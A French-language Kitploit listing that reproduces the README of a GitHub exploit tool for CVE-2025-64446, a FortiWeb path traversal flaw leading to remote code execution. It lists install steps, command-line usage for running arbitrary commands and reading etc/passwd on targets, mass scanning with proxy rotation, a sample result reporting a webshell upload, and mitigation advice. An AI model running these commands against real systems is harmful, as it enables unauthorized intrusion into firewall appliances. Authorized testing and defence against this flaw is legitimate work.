Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-64446-fortiweb-exploit — Outil de recherche en sécurité pour détecter et tester CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability) | Kitploit
Outils/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Outil de recherche en sécurité pour détecter et tester CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability)

Voir le dépôt
113il y a 10 moisPas encore vérifié
Partager

CVE-2025-64446 - Exploit de traversée de chemin avec RCE sur Fortinet FortiWeb

Outil de recherche en sécurité pour détecter et tester la vulnérabilité CVE-2025-64446 sur le pare-feu applicatif Web (WAF) Fortinet FortiWeb. Cette vulnérabilité critique de type zero-day de traversée de chemin a été activement exploitée dans la nature et permet à des attaquants non authentifiés de contourner les contrôles de sécurité et d'exécuter du code arbitraire.

⚠️ Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. N'utilisez cet outil que sur des systèmes vous appartenant ou pour lesquels vous disposez d'une autorisation écrite explicite.

📋 Aperçu

CVE-2025-64446 est une vulnérabilité critique de type zero-day de traversée de chemin dans le WAF Fortinet FortiWeb, activement exploitée dans la nature. Cette vulnérabilité permet à des attaquants non authentifiés de contourner les contrôles de sécurité via des attaques de traversée de chemin, pouvant conduire à une exécution de code à distance, à l'accès aux fichiers de configuration et à un compromis complet du système.

Score CVSS : 9,8 (Critique)
Statut : Activement exploitée dans la nature
CISA KEV : Ajoutée au catalogue des vulnérabilités connues exploitées
Correctif : FG-IR-25-910
Produit concerné : Fortinet FortiWeb WAF

🔍 Fonctionnalités

  • Détection automatisée de FortiWeb : Identifie les déploiements du WAF FortiWeb
  • Test de traversée de chemin : Teste plusieurs variations de charges utiles de traversée de chemin
  • Confirmation de vulnérabilité : Vérifie la vulnérabilité CVE-2025-64446
  • Accès aux fichiers de configuration : Tente de lire les fichiers de configuration de FortiWeb
  • Déploiement de webshell : Démontre la capacité de téléversement de webshell
  • Exécution de commandes : Exécute des commandes arbitraires (pour tests autorisés)
  • Support multi-threading : Scanne plusieurs cibles en parallèle
  • Support proxy : Contourne des restrictions de sécurité supplémentaires
  • Export JSON : Résultats détaillés au format JSON
  • Script POC inclus : Démonstration simple de preuve de concept

📦 Installation

Prérequis

  • Python 3.6 ou supérieur
  • pip (gestionnaire de paquets Python)

Installation rapide

# Cloner le dépôt
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Installer les dépendances
pip install -r requirements.txt

# Rendre les scripts exécutables (optionnel)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

Alternative : Téléchargement direct

# Télécharger les scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Installer les dépendances
pip install requests

🚀 Utilisation

Utilisation de base

# Cible unique
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Exécuter une commande personnalisée
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Plusieurs cibles depuis un fichier
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# Avec threading pour un scan plus rapide
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Sortie verbeuse pour débogage
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

Utilisation de proxys

# Proxy unique
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Plusieurs proxys depuis un fichier
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Script POC

# Test POC de base
python3 cve_2025_64446_poc.py -u http://target.com

# Test d'un fichier spécifique
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Sortie verbeuse
python3 cve_2025_64446_poc.py -u http://target.com -v

Options de la ligne de commande

-u, --url          URL cible
-f, --file         Fichier contenant les URLs cibles (une par ligne)
-c, --command      Commande à exécuter (défaut : id)
-t, --threads      Nombre de threads (défaut : 1)
-o, --output       Fichier de sortie (défaut : uknf_fortiweb_results.json)
-v, --verbose      Activer les logs verbeux
--proxy            URL du proxy (ex. : http://127.0.0.1:8080)
--proxy-list       Fichier contenant les URLs de proxys (une par ligne)

📊 Sortie

Le script génère un fichier JSON avec les résultats détaillés :

{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 Comment ça fonctionne

  1. Phase de détection : Recherche les indicateurs FortiWeb WAF (en-têtes, contenu, pages d'erreur)
  2. Test de vulnérabilité : Teste plusieurs variations de charges utiles de traversée de chemin
  3. Confirmation de la traversée de chemin : Vérifie l'accès réussi aux fichiers
  4. Accès à la configuration : Tente de lire les fichiers de configuration de FortiWeb
  5. Exploitation : Si vulnérable, démontre la capacité RCE via le déploiement d'un webshell

🛡️ Atténuation

Si vous utilisez le WAF FortiWeb :

  1. Appliquer immédiatement les mises à jour de sécurité :

    # Vérifier la version actuelle
    show system status
    
    # Mettre à jour vers la dernière version
    execute upgrade <firmware-file>
    
    • Référence : FG-IR-25-910
  2. Segmentation réseau :

    • Restreindre l'accès à l'interface de gestion FortiWeb
    • Mettre en place des ACL réseau
    • Utiliser un VPN pour l'accès administratif
  3. Renforcement de la configuration :

    • Désactiver les fonctionnalités inutiles
    • Mettre en place des contrôles d'accès stricts
    • Activer une journalisation et une surveillance complètes
  4. Exigences CISA :

    • Les agences fédérales doivent appliquer le correctif sous 7 jours
    • Surveiller le catalogue KEV de la CISA pour les mises à jour

📚 Références

  • CVE : CVE-2025-64446
  • Fortinet PSIRT : FG-IR-25-910
  • Catalogue KEV de la CISA : CVE-2025-64446
  • Blog Tenable : Analyse de CVE-2025-64446

📖 Exemples

Exemple 1 : Scan d'une cible unique

python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

Exemple 2 : Plusieurs cibles avec sortie

# Créer le fichier de cibles
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Lancer le scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

Exemple 3 : Exécution de commande personnalisée

python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

Exemple 4 : Utilisation de proxys

# Proxy unique
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Plusieurs proxys depuis un fichier
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Exemple 5 : Test POC

Télécharger l’outil